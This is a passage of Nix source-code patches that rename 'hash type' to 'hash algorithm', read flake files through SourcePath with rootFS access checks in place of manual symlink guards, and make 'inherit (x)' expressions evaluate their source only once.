+        HashAlgorithm hashAlgo = parseHashAlgo(*hashAlgoRaw);
         return hashAlgo;
     };
 
diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh
index 80538df50..5925f8e01 100644
--- a/src/libstore/content-address.hh
+++ b/src/libstore/content-address.hh
@@ -91,17 +91,17 @@ struct ContentAddressMethod
     std::string_view renderPrefix() const;
 
     /**
-     * Parse a content addressing method and hash type.
+     * Parse a content addressing method and hash algorithm.
      */
     static std::pair parseWithAlgo(std::string_view rawCaMethod);
 
     /**
-     * Render a content addressing method and hash type in a
+     * Render a content addressing method and hash algorithm in a
      * nicer way, prefixing both cases.
      *
      * The rough inverse of `parse()`.
      */
-    std::string renderWithAlgo(HashAlgorithm ht) const;
+    std::string renderWithAlgo(HashAlgorithm ha) const;
 
     /**
      * Get the underlying way to content-address file system objects.
@@ -127,7 +127,7 @@ struct ContentAddressMethod
  *   ‘text:sha256:’
  *
  * - `FixedIngestionMethod`:
- *   ‘fixed:::’
+ *   ‘fixed:::’
  */
 struct ContentAddress
 {
diff --git a/src/libstore/derivations.cc b/src/libstore/derivations.cc
index 36042c06c..305ed5b42 100644
--- a/src/libstore/derivations.cc
+++ b/src/libstore/derivations.cc
@@ -701,7 +701,7 @@ DerivationType BasicDerivation::type() const
                     floatingHashAlgo = dof.hashAlgo;
                 } else {
                     if (*floatingHashAlgo != dof.hashAlgo)
-                        throw Error("all floating outputs must use the same hash type");
+                        throw Error("all floating outputs must use the same hash algorithm");
                 }
             },
             [&](const DerivationOutput::Deferred &) {
diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 8330d6571..e6544976a 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -1094,8 +1094,8 @@ public:
         this, {}, "hashed-mirrors",
         R"(
           A list of web servers used by `builtins.fetchurl` to obtain files by
-          hash. Given a hash type *ht* and a base-16 hash *h*, Nix will try to
-          download the file from *hashed-mirror*/*ht*/*h*. This allows files to
+          hash. Given a hash algorithm *ha* and a base-16 hash *h*, Nix will try to
+          download the file from *hashed-mirror*/*ha*/*h*. This allows files to
           be downloaded even if they have disappeared from their original URI.
           For example, given an example mirror `http://tarballs.nixos.org/`,
           when building the derivation
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 6753e0f49..2339024a2 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -63,10 +63,10 @@ void restorePath(
 
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ht,
+    FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter)
 {
-    HashSink sink { ht };
+    HashSink sink { ha };
     dumpPath(accessor, path, sink, method, filter);
     return sink.finish();
 }
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 41f23f2af..9a7dae8c6 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -63,11 +63,11 @@ void restorePath(
  * Compute the hash of the given file system object according to the
  * given method.
  *
- * The hash is defined as (essentially) hashString(ht, dumpPath(path)).
+ * The hash is defined as (essentially) hashString(ha, dumpPath(path)).
  */
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ht,
+    FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter = defaultPathFilter);
 
 }
diff --git a/src/libutil/hash.cc b/src/libutil/hash.cc
index d067da969..d4c9d6533 100644
--- a/src/libutil/hash.cc
+++ b/src/libutil/hash.cc
@@ -274,7 +274,7 @@ Hash newHashAllowEmpty(std::string_view hashStr, std::optional ha
 {
     if (hashStr.empty()) {
         if (!ha)
-            throw BadHash("empty hash requires explicit hash type");
+            throw BadHash("empty hash requires explicit hash algorithm");
         Hash h(*ha);
         warn("found empty hash, assuming '%s'", h.to_string(HashFormat::SRI, true));
         return h;
diff --git a/src/libutil/hash.hh b/src/libutil/hash.hh
index f7e8eb265..e14aae43c 100644
--- a/src/libutil/hash.hh
+++ b/src/libutil/hash.hh
@@ -58,7 +58,7 @@ struct Hash
      * Parse the hash from a string representation in the format
      * "[:]" or "-" (a
      * Subresource Integrity hash expression). If the 'type' argument
-     * is not present, then the hash type must be specified in the
+     * is not present, then the hash algorithm must be specified in the
      * string.
      */
     static Hash parseAny(std::string_view s, std::optional optAlgo);
@@ -200,7 +200,7 @@ std::optional parseHashFormatOpt(std::string_view hashFormatName);
 std::string_view printHashFormat(HashFormat hashFormat);
 
 /**
- * Parse a string representing a hash type.
+ * Parse a string representing a hash algorithm.
  */
 HashAlgorithm parseHashAlgo(std::string_view s);
 

From 598deb2b23bc59df61c92ea25745d675686f3991 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 26 Feb 2024 15:08:08 +0100
Subject: [PATCH 516/654] Use SourcePath for reading flake.{nix,lock}

Flakes still reside in the Nix store (so there shouldn't be any change
in behaviour), but they are now accessed via the rootFS
accessor. Since rootFS implements access checks, we no longer have to
worry about flake.{nix,lock} or their parents being symlinks that
escape from the flake.

Extracted from the lazy-trees branch.
---
 src/libcmd/installables.cc    |  3 +-
 src/libexpr/flake/flake.cc    | 93 ++++++++++++++++++-----------------
 src/libexpr/flake/flake.hh    | 17 +++++--
 src/libexpr/flake/lockfile.cc | 10 ++--
 src/libexpr/flake/lockfile.hh |  4 +-
 src/nix/flake.cc              | 13 +++--
 6 files changed, 77 insertions(+), 63 deletions(-)

diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc
index 16d25d3cf..d87d7b9b1 100644
--- a/src/libcmd/installables.cc
+++ b/src/libcmd/installables.cc
@@ -21,6 +21,7 @@
 #include "url.hh"
 #include "registry.hh"
 #include "build-result.hh"
+#include "fs-input-accessor.hh"
 
 #include 
 #include 
@@ -146,7 +147,7 @@ MixFlakeOptions::MixFlakeOptions()
         .category = category,
         .labels = {"flake-lock-path"},
         .handler = {[&](std::string lockFilePath) {
-            lockFlags.referenceLockFilePath = lockFilePath;
+            lockFlags.referenceLockFilePath = getUnfilteredRootPath(CanonPath(absPath(lockFilePath)));
         }},
         .completer = completePath
     });
diff --git a/src/libexpr/flake/flake.cc b/src/libexpr/flake/flake.cc
index 022d39cdb..fd9341504 100644
--- a/src/libexpr/flake/flake.cc
+++ b/src/libexpr/flake/flake.cc
@@ -139,7 +139,7 @@ static FlakeInput parseFlakeInput(EvalState & state,
                         attrs.emplace(state.symbols[attr.name], Explicit { attr.value->boolean });
                         break;
                     case nInt:
-                        attrs.emplace(state.symbols[attr.name], (long unsigned int)attr.value->integer);
+                        attrs.emplace(state.symbols[attr.name], (long unsigned int) attr.value->integer);
                         break;
                     default:
                         if (attr.name == state.symbols.create("publicKeys")) {
@@ -202,43 +202,28 @@ static std::map parseFlakeInputs(
     return inputs;
 }
 
-static Flake getFlake(
+static Flake readFlake(
     EvalState & state,
     const FlakeRef & originalRef,
-    bool allowLookup,
-    FlakeCache & flakeCache,
-    InputPath lockRootPath)
+    const FlakeRef & resolvedRef,
+    const FlakeRef & lockedRef,
+    const SourcePath & rootDir,
+    const InputPath & lockRootPath)
 {
-    auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
-        state, originalRef, allowLookup, flakeCache);
+    auto flakePath = rootDir / CanonPath(resolvedRef.subdir) / "flake.nix";
 
-    // We need to guard against symlink attacks, but before we start doing
-    // filesystem operations we should make sure there's a flake.nix in the
-    // first place.
-    auto unsafeFlakeDir = state.store->toRealPath(storePath) + "/" + lockedRef.subdir;
-    auto unsafeFlakeFile = unsafeFlakeDir + "/flake.nix";
-    if (!pathExists(unsafeFlakeFile))
-        throw Error("source tree referenced by '%s' does not contain a '%s/flake.nix' file", lockedRef, lockedRef.subdir);
+    Value vInfo;
+    state.evalFile(flakePath, vInfo, true);
 
-    // Guard against symlink attacks.
-    auto flakeDir = canonPath(unsafeFlakeDir, true);
-    auto flakeFile = canonPath(flakeDir + "/flake.nix", true);
-    if (!isInDir(flakeFile, state.store->toRealPath(storePath)))
-        throw Error("'flake.nix' file of flake '%s' escapes from '%s'",
-            lockedRef, state.store->printStorePath(storePath));
+    expectType(state, nAttrs, vInfo, state.positions.add(Pos::Origin(rootDir), 1, 1));
 
     Flake flake {
         .originalRef = originalRef,
         .resolvedRef = resolvedRef,
         .lockedRef = lockedRef,
-        .storePath = storePath,
+        .path = flakePath,
     };
 
-    Value vInfo;
-    state.evalFile(state.rootPath(CanonPath(flakeFile)), vInfo, true); // FIXME: symlink attack
-
-    expectType(state, nAttrs, vInfo, state.positions.add({state.rootPath(CanonPath(flakeFile))}, 1, 1));
-
     if (auto description = vInfo.attrs->get(state.sDescription)) {
         expectType(state, nString, *description->value, description->pos);
         flake.description = description->value->c_str();
@@ -247,7 +232,7 @@ static Flake getFlake(
     auto sInputs = state.symbols.create("inputs");
 
     if (auto inputs = vInfo.attrs->get(sInputs))
-        flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakeDir, lockRootPath);
+        flake.inputs = parseFlakeInputs(state, inputs->value, inputs->pos, flakePath.parent().path.abs(), lockRootPath); // FIXME
 
     auto sOutputs = state.symbols.create("outputs");
 
@@ -264,7 +249,7 @@ static Flake getFlake(
         }
 
     } else
-        throw Error("flake '%s' lacks attribute 'outputs'", lockedRef);
+        throw Error("flake '%s' lacks attribute 'outputs'", resolvedRef);
 
     auto sNixConfig = state.symbols.create("nixConfig");
 
@@ -281,7 +266,7 @@ static Flake getFlake(
                 NixStringContext emptyContext = {};
                 flake.config.settings.emplace(
                     state.symbols[setting.name],
-                    state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true) .toOwned());
+                    state.coerceToString(setting.pos, *setting.value, emptyContext, "", false, true, true).toOwned());
             }
             else if (setting.value->type() == nInt)
                 flake.config.settings.emplace(
@@ -313,12 +298,25 @@ static Flake getFlake(
             attr.name != sOutputs &&
             attr.name != sNixConfig)
             throw Error("flake '%s' has an unsupported attribute '%s', at %s",
-                lockedRef, state.symbols[attr.name], state.positions[attr.pos]);
+                resolvedRef, state.symbols[attr.name], state.positions[attr.pos]);
     }
 
     return flake;
 }
 
+static Flake getFlake(
+    EvalState & state,
+    const FlakeRef & originalRef,
+    bool allowLookup,
+    FlakeCache & flakeCache,
+    InputPath lockRootPath)
+{
+    auto [storePath, resolvedRef, lockedRef] = fetchOrSubstituteTree(
+        state, originalRef, allowLookup, flakeCache);
+
+    return readFlake(state, originalRef, resolvedRef, lockedRef, state.rootPath(state.store->toRealPath(storePath)), lockRootPath);
+}
+
 Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup, FlakeCache & flakeCache)
 {
     return getFlake(state, originalRef, allowLookup, flakeCache, {});
@@ -330,6 +328,13 @@ Flake getFlake(EvalState & state, const FlakeRef & originalRef, bool allowLookup
     return getFlake(state, originalRef, allowLookup, flakeCache);
 }
 
+static LockFile readLockFile(const SourcePath & lockFilePath)
+{
+    return lockFilePath.pathExists()
+        ? LockFile(lockFilePath.readFile(), fmt("%s", lockFilePath))
+        : LockFile();
+}
+
 /* Compute an in-memory lock file for the specified top-level flake,
    and optionally write it to file, if the flake is writable. */
 LockedFlake lockFlake(
@@ -355,17 +360,16 @@ LockedFlake lockFlake(
             throw Error("reference lock file was provided, but the `allow-dirty` setting is set to false");
         }
 
-        // FIXME: symlink attack
-        auto oldLockFile = LockFile::read(
+        auto oldLockFile = readLockFile(
             lockFlags.referenceLockFilePath.value_or(
-                state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir + "/flake.lock"));
+                flake.lockFilePath()));
 
         debug("old lock file: %s", oldLockFile);
 
         std::map overrides;
         std::set explicitCliOverrides;
         std::set overridesUsed, updatesUsed;
-        std::map, StorePath> nodePaths;
+        std::map, SourcePath> nodePaths;
 
         for (auto & i : lockFlags.inputOverrides) {
             overrides.insert_or_assign(i.first, FlakeInput { .ref = i.second });
@@ -538,7 +542,7 @@ LockedFlake lockFlake(
 
                         if (mustRefetch) {
                             auto inputFlake = getFlake(state, oldLock->lockedRef, false, flakeCache, inputPath);
-                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            nodePaths.emplace(childNode, inputFlake.path.parent());
                             computeLocks(inputFlake.inputs, childNode, inputPath, oldLock, lockRootPath, parentPath, false);
                         } else {
                             computeLocks(fakeInputs, childNode, inputPath, oldLock, lockRootPath, parentPath, true);
@@ -587,13 +591,12 @@ LockedFlake lockFlake(
                                flake. Also, unless we already have this flake
                                in the top-level lock file, use this flake's
                                own lock file. */
-                            nodePaths.emplace(childNode, inputFlake.storePath);
+                            nodePaths.emplace(childNode, inputFlake.path.parent());
                             computeLocks(
                                 inputFlake.inputs, childNode, inputPath,
                                 oldLock
                                 ? std::dynamic_pointer_cast(oldLock)
-                                : LockFile::read(
-                                    state.store->toRealPath(inputFlake.storePath) + "/" + inputFlake.lockedRef.subdir + "/flake.lock").root.get_ptr(),
+                                : readLockFile(inputFlake.lockFilePath()).root.get_ptr(),
                                 oldLock ? lockRootPath : inputPath,
                                 localPath,
                                 false);
@@ -605,7 +608,7 @@ LockedFlake lockFlake(
 
                             auto childNode = make_ref(lockedRef, ref, false);
 
-                            nodePaths.emplace(childNode, storePath);
+                            nodePaths.emplace(childNode, state.rootPath(state.store->toRealPath(storePath)));
 
                             node->inputs.insert_or_assign(id, childNode);
                         }
@@ -619,9 +622,9 @@ LockedFlake lockFlake(
         };
 
         // Bring in the current ref for relative path resolution if we have it
-        auto parentPath = canonPath(state.store->toRealPath(flake.storePath) + "/" + flake.lockedRef.subdir, true);
+        auto parentPath = flake.path.parent().path.abs();
 
-        nodePaths.emplace(newLockFile.root, flake.storePath);
+        nodePaths.emplace(newLockFile.root, flake.path.parent());
 
         computeLocks(
             flake.inputs,
@@ -746,13 +749,15 @@ void callFlake(EvalState & state,
 
     auto overrides = state.buildBindings(lockedFlake.nodePaths.size());
 
-    for (auto & [node, storePath] : lockedFlake.nodePaths) {
+    for (auto & [node, sourcePath] : lockedFlake.nodePaths) {
         auto override = state.buildBindings(2);
 
         auto & vSourceInfo = override.alloc(state.symbols.create("sourceInfo"));
 
         auto lockedNode = node.dynamic_pointer_cast();
 
+        auto [storePath, subdir] = state.store->toStorePath(sourcePath.path.abs());
+
         emitTreeAttrs(
             state,
             storePath,
@@ -766,7 +771,7 @@ void callFlake(EvalState & state,
 
         override
             .alloc(state.symbols.create("dir"))
-            .mkString(lockedNode ? lockedNode->lockedRef.subdir : lockedFlake.flake.lockedRef.subdir);
+            .mkString(CanonPath(subdir).rel());
 
         overrides.alloc(state.symbols.create(key->second)).mkAttrs(override);
     }
@@ -928,7 +933,7 @@ Fingerprint LockedFlake::getFingerprint() const
     // flake.sourceInfo.storePath for the fingerprint.
     return hashString(HashAlgorithm::SHA256,
         fmt("%s;%s;%d;%d;%s",
-            flake.storePath.to_string(),
+            flake.path.to_string(),
             flake.lockedRef.subdir,
             flake.lockedRef.input.getRevCount().value_or(0),
             flake.lockedRef.input.getLastModified().value_or(0),
diff --git a/src/libexpr/flake/flake.hh b/src/libexpr/flake/flake.hh
index 19b680c56..48907813f 100644
--- a/src/libexpr/flake/flake.hh
+++ b/src/libexpr/flake/flake.hh
@@ -77,18 +77,27 @@ struct Flake
      * the specific local store result of invoking the fetcher
      */
     FlakeRef lockedRef;
+    /**
+     * The path of `flake.nix`.
+     */
+    SourcePath path;
     /**
      * pretend that 'lockedRef' is dirty
      */
     bool forceDirty = false;
     std::optional description;
-    StorePath storePath;
     FlakeInputs inputs;
     /**
      * 'nixConfig' attribute
      */
     ConfigFile config;
+
     ~Flake();
+
+    SourcePath lockFilePath()
+    {
+        return path.parent() / "flake.lock";
+    }
 };
 
 Flake getFlake(EvalState & state, const FlakeRef & flakeRef, bool allowLookup);
@@ -104,11 +113,11 @@ struct LockedFlake
     LockFile lockFile;
 
     /**
-     * Store paths of nodes that have been fetched in
+     * Source tree accessors for nodes that have been fetched in
      * lockFlake(); in particular, the root node and the overriden
      * inputs.
      */
-    std::map, StorePath> nodePaths;
+    std::map, SourcePath> nodePaths;
 
     Fingerprint getFingerprint() const;
 };
@@ -165,7 +174,7 @@ struct LockFlags
     /**
      * The path to a lock file to read instead of the `flake.lock` file in the top-level flake
      */
-    std::optional referenceLockFilePath;
+    std::optional referenceLockFilePath;
 
     /**
      * The path to a lock file to write to instead of the `flake.lock` file in the top-level flake
diff --git a/src/libexpr/flake/lockfile.cc b/src/libexpr/flake/lockfile.cc
index e3a28c7c6..d252214dd 100644
--- a/src/libexpr/flake/lockfile.cc
+++ b/src/libexpr/flake/lockfile.cc
@@ -84,8 +84,10 @@ std::shared_ptr LockFile::findInput(const InputPath & path)
     return doFind(root, path, visited);
 }
 
-LockFile::LockFile(const nlohmann::json & json, const Path & path)
+LockFile::LockFile(std::string_view contents, std::string_view path)
 {
+    auto json = nlohmann::json::parse(contents);
+
     auto version = json.value("version", 0);
     if (version < 5 || version > 7)
         throw Error("lock file '%s' has unsupported version %d", path, version);
@@ -203,12 +205,6 @@ std::pair LockFile::to_string() const
     return {json.dump(2), std::move(nodeKeys)};
 }
 
-LockFile LockFile::read(const Path & path)
-{
-    if (!pathExists(path)) return LockFile();
-    return LockFile(nlohmann::json::parse(readFile(path)), path);
-}
-
 std::ostream & operator <<(std::ostream & stream, const LockFile & lockFile)
 {
     stream << lockFile.toJSON().first.dump(2);
diff --git a/src/libexpr/flake/lockfile.hh b/src/libexpr/flake/lockfile.hh
index 57a7202a2..7e62e6d09 100644
--- a/src/libexpr/flake/lockfile.hh
+++ b/src/libexpr/flake/lockfile.hh
@@ -55,7 +55,7 @@ struct LockFile
     ref root = make_ref();
 
     LockFile() {};
-    LockFile(const nlohmann::json & json, const Path & path);
+    LockFile(std::string_view contents, std::string_view path);
 
     typedef std::map, std::string> KeyMap;
 
@@ -63,8 +63,6 @@ struct LockFile
 
     std::pair to_string() const;
 
-    static LockFile read(const Path & path);
-
     /**
      * Check whether this lock file has any unlocked inputs. If so,
      * return one.
diff --git a/src/nix/flake.cc b/src/nix/flake.cc
index 131589f35..e4daa4dba 100644
--- a/src/nix/flake.cc
+++ b/src/nix/flake.cc
@@ -205,6 +205,9 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
         auto lockedFlake = lockFlake();
         auto & flake = lockedFlake.flake;
 
+        // Currently, all flakes are in the Nix store via the rootFS accessor.
+        auto storePath = store->printStorePath(store->toStorePath(flake.path.path.abs()).first);
+
         if (json) {
             nlohmann::json j;
             if (flake.description)
@@ -223,7 +226,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
                 j["revCount"] = *revCount;
             if (auto lastModified = flake.lockedRef.input.getLastModified())
                 j["lastModified"] = *lastModified;
-            j["path"] = store->printStorePath(flake.storePath);
+            j["path"] = storePath;
             j["locks"] = lockedFlake.lockFile.toJSON().first;
             logger->cout("%s", j.dump());
         } else {
@@ -239,7 +242,7 @@ struct CmdFlakeMetadata : FlakeCommand, MixJSON
                     *flake.description);
             logger->cout(
                 ANSI_BOLD "Path:" ANSI_NORMAL "          %s",
-                store->printStorePath(flake.storePath));
+                storePath);
             if (auto rev = flake.lockedRef.input.getRev())
                 logger->cout(
                     ANSI_BOLD "Revision:" ANSI_NORMAL "      %s",
@@ -1031,7 +1034,9 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
 
         StorePathSet sources;
 
-        sources.insert(flake.flake.storePath);
+        auto storePath = store->toStorePath(flake.flake.path.path.abs()).first;
+
+        sources.insert(storePath);
 
         // FIXME: use graph output, handle cycles.
         std::function traverse;
@@ -1060,7 +1065,7 @@ struct CmdFlakeArchive : FlakeCommand, MixJSON, MixDryRun
 
         if (json) {
             nlohmann::json jsonRoot = {
-                {"path", store->printStorePath(flake.flake.storePath)},
+                {"path", store->printStorePath(storePath)},
                 {"inputs", traverse(*flake.lockFile.root)},
             };
             logger->cout("%s", jsonRoot);

From cefd0302b55b3360dbca59cfcb4bf6a750d6cdcf Mon Sep 17 00:00:00 2001
From: pennae 
Date: Sat, 27 Jan 2024 16:33:34 +0100
Subject: [PATCH 517/654] evaluate inherit (from) exprs only once per directive

desugaring inherit-from to syntactic duplication of the source expr also
duplicates side effects of the source expr (such as trace calls) and
expensive computations (such as derivationStrict).
---
 doc/manual/rl-next/inherit-from-by-need.md    |  7 +++
 src/libexpr/eval.cc                           | 24 ++++++++--
 src/libexpr/nixexpr.cc                        | 44 ++++++++++++++++---
 src/libexpr/nixexpr.hh                        | 16 +++++++
 src/libexpr/parser-state.hh                   | 11 +++++
 src/libexpr/parser.y                          |  7 ++-
 .../lang/eval-okay-inherit-from.err.exp       |  1 -
 .../lang/eval-okay-inherit-from.exp           |  2 +-
 .../lang/eval-okay-inherit-from.nix           | 12 ++++-
 9 files changed, 109 insertions(+), 15 deletions(-)
 create mode 100644 doc/manual/rl-next/inherit-from-by-need.md

diff --git a/doc/manual/rl-next/inherit-from-by-need.md b/doc/manual/rl-next/inherit-from-by-need.md
new file mode 100644
index 000000000..67c2cdedf
--- /dev/null
+++ b/doc/manual/rl-next/inherit-from-by-need.md
@@ -0,0 +1,7 @@
+---
+synopsis: "`inherit (x) ...` evaluates `x` only once"
+prs: 9847
+---
+
+`inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
+This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 91341e167..a353571af 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -1186,6 +1186,18 @@ void ExprPath::eval(EvalState & state, Env & env, Value & v)
 }
 
 
+Env * ExprAttrs::buildInheritFromEnv(EvalState & state, Env & up)
+{
+    Env & inheritEnv = state.allocEnv(inheritFromExprs->size());
+    inheritEnv.up = &up;
+
+    Displacement displ = 0;
+    for (auto from : *inheritFromExprs)
+        inheritEnv.values[displ++] = from->maybeThunk(state, up);
+
+    return &inheritEnv;
+}
+
 void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
 {
     v.mkAttrs(state.buildBindings(attrs.size() + dynamicAttrs.size()).finish());
@@ -1197,6 +1209,7 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
         Env & env2(state.allocEnv(attrs.size()));
         env2.up = &env;
         dynamicEnv = &env2;
+        Env * inheritEnv = inheritFromExprs ? buildInheritFromEnv(state, env2) : nullptr;
 
         AttrDefs::iterator overrides = attrs.find(state.sOverrides);
         bool hasOverrides = overrides != attrs.end();
@@ -1209,9 +1222,9 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
             Value * vAttr;
             if (hasOverrides && !i.second.inherited()) {
                 vAttr = state.allocValue();
-                mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, &env2), i.second.e);
+                mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, inheritEnv), i.second.e);
             } else
-                vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, &env2));
+                vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, inheritEnv));
             env2.values[displ++] = vAttr;
             v.attrs->push_back(Attr(i.first, vAttr, i.second.pos));
         }
@@ -1244,10 +1257,11 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v)
     }
 
     else {
+        Env * inheritEnv = inheritFromExprs ? buildInheritFromEnv(state, env) : nullptr;
         for (auto & i : attrs) {
             v.attrs->push_back(Attr(
                     i.first,
-                    i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, &env)),
+                    i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, inheritEnv)),
                     i.second.pos));
         }
     }
@@ -1282,6 +1296,8 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
     Env & env2(state.allocEnv(attrs->attrs.size()));
     env2.up = &env;
 
+    Env * inheritEnv = attrs->inheritFromExprs ? attrs->buildInheritFromEnv(state, env2) : nullptr;
+
     /* The recursive attributes are evaluated in the new environment,
        while the inherited attributes are evaluated in the original
        environment. */
@@ -1289,7 +1305,7 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
     for (auto & i : attrs->attrs) {
         env2.values[displ++] = i.second.e->maybeThunk(
             state,
-            *i.second.chooseByKind(&env2, &env, &env2));
+            *i.second.chooseByKind(&env2, &env, inheritEnv));
     }
 
     auto dts = state.debugRepl
diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc
index 82e69de51..4b805d710 100644
--- a/src/libexpr/nixexpr.cc
+++ b/src/libexpr/nixexpr.cc
@@ -80,7 +80,7 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
         return sa < sb;
     });
     std::vector inherits;
-    std::map> inheritsFrom;
+    std::map> inheritsFrom;
     for (auto & i : sorted) {
         switch (i->second.kind) {
         case AttrDef::Kind::Plain:
@@ -90,7 +90,8 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
             break;
         case AttrDef::Kind::InheritedFrom: {
             auto & select = dynamic_cast(*i->second.e);
-            inheritsFrom[select.e].push_back(i->first);
+            auto & from = dynamic_cast(*select.e);
+            inheritsFrom[&from].push_back(i->first);
             break;
         }
         }
@@ -102,7 +103,7 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co
     }
     for (const auto & [from, syms] : inheritsFrom) {
         str << "inherit (";
-        from->show(symbols, str);
+        (*inheritFromExprs)[from->displ]->show(symbols, str);
         str << ")";
         for (auto sym : syms) str << " " << symbols[sym];
         str << "; ";
@@ -328,6 +329,12 @@ void ExprVar::bindVars(EvalState & es, const std::shared_ptr &
     this->level = withLevel;
 }
 
+void ExprInheritFrom::bindVars(EvalState & es, const std::shared_ptr & env)
+{
+    if (es.debugRepl)
+        es.exprEnvs.insert(std::make_pair(this, env));
+}
+
 void ExprSelect::bindVars(EvalState & es, const std::shared_ptr & env)
 {
     if (es.debugRepl)
@@ -351,6 +358,27 @@ void ExprOpHasAttr::bindVars(EvalState & es, const std::shared_ptrbindVars(es, env);
 }
 
+std::shared_ptr ExprAttrs::bindInheritSources(
+    EvalState & es, const std::shared_ptr & env)
+{
+    if (!inheritFromExprs)
+        return nullptr;
+
+    // the inherit (from) source values are inserted into an env of its own, which
+    // does not introduce any variable names.
+    // analysis must see an empty env, or an env that contains only entries with
+    // otherwise unused names to not interfere with regular names. the parser
+    // has already filled all exprs that access this env with appropriate level
+    // and displacement, and nothing else is allowed to access it. ideally we'd
+    // not even *have* an expr that grabs anything from this env since it's fully
+    // invisible, but the evaluator does not allow for this yet.
+    auto inner = std::make_shared(nullptr, env.get(), 0);
+    for (auto from : *inheritFromExprs)
+        from->bindVars(es, env);
+
+    return inner;
+}
+
 void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr & env)
 {
     if (es.debugRepl)
@@ -368,8 +396,9 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr
 
         // No need to sort newEnv since attrs is in sorted order.
 
+        auto inheritFromEnv = bindInheritSources(es, newEnv);
         for (auto & i : attrs)
-            i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv));
+            i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, inheritFromEnv));
 
         for (auto & i : dynamicAttrs) {
             i.nameExpr->bindVars(es, newEnv);
@@ -377,8 +406,10 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr
         }
     }
     else {
+        auto inheritFromEnv = bindInheritSources(es, env);
+
         for (auto & i : attrs)
-            i.second.e->bindVars(es, i.second.chooseByKind(env, env, env));
+            i.second.e->bindVars(es, i.second.chooseByKind(env, env, inheritFromEnv));
 
         for (auto & i : dynamicAttrs) {
             i.nameExpr->bindVars(es, env);
@@ -446,8 +477,9 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr &
 
     // No need to sort newEnv since attrs->attrs is in sorted order.
 
+    auto inheritFromEnv = attrs->bindInheritSources(es, newEnv);
     for (auto & i : attrs->attrs)
-        i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv));
+        i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, inheritFromEnv));
 
     if (es.debugRepl)
         es.exprEnvs.insert(std::make_pair(this, newEnv));
diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh
index 4a93143b4..4bb2ee2f9 100644
--- a/src/libexpr/nixexpr.hh
+++ b/src/libexpr/nixexpr.hh
@@ -135,6 +135,18 @@ struct ExprVar : Expr
     COMMON_METHODS
 };
 
+struct ExprInheritFrom : ExprVar
+{
+    ExprInheritFrom(PosIdx pos, Displacement displ): ExprVar(pos, {})
+    {
+        this->level = 0;
+        this->displ = displ;
+        this->fromWith = nullptr;
+    }
+
+    void bindVars(EvalState & es, const std::shared_ptr & env);
+};
+
 struct ExprSelect : Expr
 {
     PosIdx pos;
@@ -195,6 +207,7 @@ struct ExprAttrs : Expr
     };
     typedef std::map AttrDefs;
     AttrDefs attrs;
+    std::unique_ptr> inheritFromExprs;
     struct DynamicAttrDef {
         Expr * nameExpr, * valueExpr;
         PosIdx pos;
@@ -208,6 +221,9 @@ struct ExprAttrs : Expr
     PosIdx getPos() const override { return pos; }
     COMMON_METHODS
 
+    std::shared_ptr bindInheritSources(
+        EvalState & es, const std::shared_ptr & env);
+    Env * buildInheritFromEnv(EvalState & state, Env & up);
     void showBindings(const SymbolTable & symbols, std::ostream & str) const;
 };
 
diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh
index ae38de130..9aa18a0ae 100644
--- a/src/libexpr/parser-state.hh
+++ b/src/libexpr/parser-state.hh
